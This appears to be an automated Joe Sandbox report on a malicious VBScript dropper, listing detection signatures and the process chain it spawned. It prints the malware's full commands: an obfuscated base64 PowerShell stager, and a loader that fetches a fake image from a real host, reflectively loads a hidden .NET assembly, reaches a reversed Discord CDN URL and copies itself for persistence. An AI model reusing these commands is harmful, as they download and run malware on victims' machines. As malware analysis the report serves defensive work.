Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
las.vbs

Overview

General Information

Sample name:las.vbs
Analysis ID:1448040
MD5:bb1eec910e4f4b91dd5bd07a465f8748
SHA1:5a5284beb995058987ae3639c15e027250f754f7
SHA256:d698647bb16de1b0529f43dc9c45fa4ed0fb194e48aa204acf14921bafeadfa3
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7252 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreZgBmDgTreDUDgTreZDgTreDgTreyDgTreDEDgTreOQBlDgTreDgDgTreZQBiDgTreDDgTreDgTreZgDgTre4DgTreDYDgTreMQDgTrewDgTreDDgTreDgTreZQDgTre5DgTreDDgTreDgTreMwBjDgTreDgDgTreODgTreDgTre3DgTreGEDgTreNQBiDgTreGUDgTreYQDgTrezDgTreGYDgTreZDgTreDgTrexDgTreGEDgTreOQDgTre3DgTreDIDgTreYQDgTre2DgTreDkDgTreNgDgTrexDgTreGIDgTreNgDgTre4DgTreDQDgTreMgDgTrexDgTreDDgTreDgTreOQBkDgTreDgDgTreZQDgTre4DgTreDkDgTreNgDgTre0DgTreDQDgTreMQDgTre5DgTreGIDgTreNDgTreDgTre9DgTreG0DgTreaDgTreDgTremDgTreGEDgTreNgDgTreyDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGEDgTreZQDgTrezDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrecwB3DgTreG8DgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreDYDgTreNQDgTrewDgTreDEDgTreNDgTreDgTre1DgTreDIDgTreMgDgTrezDgTreDMDgTreMQDgTrexDgTreDEDgTreMgDgTre2DgTreDMDgTreNDgTreDgTreyDgTreDEDgTreLwDgTrezDgTreDQDgTreNgDgTrexDgTreDkDgTreMQDgTrexDgTreDEDgTreNQDgTrezDgTreDIDgTreMDgTreDgTre3DgTreDIDgTreNgDgTre1DgTreDMDgTreMgDgTrexDgTreC8DgTrecwB0DgTreG4DgTreZQBtDgTreGgDgTreYwBhDgTreHQDgTredDgTreBhDgTreC8DgTrebQBvDgTreGMDgTreLgBwDgTreHDgTreDgTreYQBkDgTreHIDgTrebwBjDgTreHMDgTreaQBkDgTreC4DgTrebgBkDgTreGMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreYwBvDgTreGcDgTrebgBpDgTreHQDgTreaQB2DgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 8068 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 8188 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7320JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 7320INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x178d75:$b2: ::FromBase64String(
    • 0x17a2bb:$b2: ::FromBase64String(
    • 0x17a960:$b2: ::FromBase64String(
    • 0x17b126:$b2: ::FromBase64String(
    • 0x17b781:$b2: ::FromBase64String(
    • 0x1b963e:$b2: ::FromBase64String(
    • 0x178bda:$b3: ::UTF8.GetString(
    • 0x17a120:$b3: ::UTF8.GetString(
    • 0x17a7c5:$b3: ::UTF8.GetString(
    • 0x17af8b:$b3: ::UTF8.GetString(
    • 0x17b5e6:$b3: ::UTF8.GetString(
    • 0x18f37b:$s1: -join
    • 0x1941ae:$s1: -join
    • 0xadae6:$s3: reverse
    • 0xb79ad:$s3: reverse
    • 0xc910f:$s3: reverse
    • 0xd4a09:$s3: reverse
    • 0xdc6d4:$s3: reverse
    • 0xdc9c2:$s3: reverse
    • 0xdd0dc:$s3: reverse
    • 0xdd895:$s3: reverse
    SourceRuleDescriptionAuthorStrings
    amsi64_7476.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Spreading

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetM

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZD